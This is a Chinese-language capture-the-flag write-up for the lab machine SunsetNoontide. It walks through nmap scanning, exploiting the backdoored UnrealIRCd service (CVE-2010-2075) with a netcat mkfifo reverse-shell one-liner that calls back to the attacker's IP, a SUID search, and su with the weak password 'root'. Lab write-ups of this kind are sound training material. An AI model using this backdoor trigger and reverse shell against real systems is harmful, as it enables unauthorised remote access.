# PG-SunsetNoontide Writeup ## Step.1 掃描 一樣先`namp`掃描 ```bash= nmap -sV -T5 192.168.195.120 ``` 找到一個開啟的 port `6667` 執行的服務是`irc`版本為`UnrealIRCd` ``` 6667/tcp open irc UnrealIRCd ``` 接著根據這個版本掃描對應漏洞 ```bash= nmap --script "irc-unrealircd-backdoor" -p 6667 192.168.195.120 ``` 掃完發現有漏洞`CVE-2010-2075` ``` |_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277 ``` ## Step.2 Exploit Google 找到這個 cve 的 exploit [CVE-2010-2075](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2075) [13853.pl](https://www.exploit-db.com/exploits/13853) 用了之後發現這個 exploit 好像已經失效了 改成直接`nc`進去傳 reverse shell 用[revshells](https://www.revshells.com/)這個網站嘗試各種 shell ```bash= nc -nvlp 80 ``` ### local flag 嘗試過後最終發現`nc mkfifo`有效 ```bash= nc 192.168.195.120 6667 ``` ```bash= nc -nvlp 80 ``` ```bash= AB;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.179 80 >/tmp/f ``` 用 `pty` 美化 terminal 找到local.txt  ### remote flag 嘗試`sudo`後發現沒有此指令，嘗試尋找擁有`SUID`的指令 > `SUID` 是指無視執行人的權限，執行文件時都會以該文件擁有者的權限執行 ```bash= find / -perm /4000 2>/dev/null ``` > `2>/dev/null` 不顯示錯誤訊息 發現有`su`這個指令 嘗試弱密碼 `root` 成功破解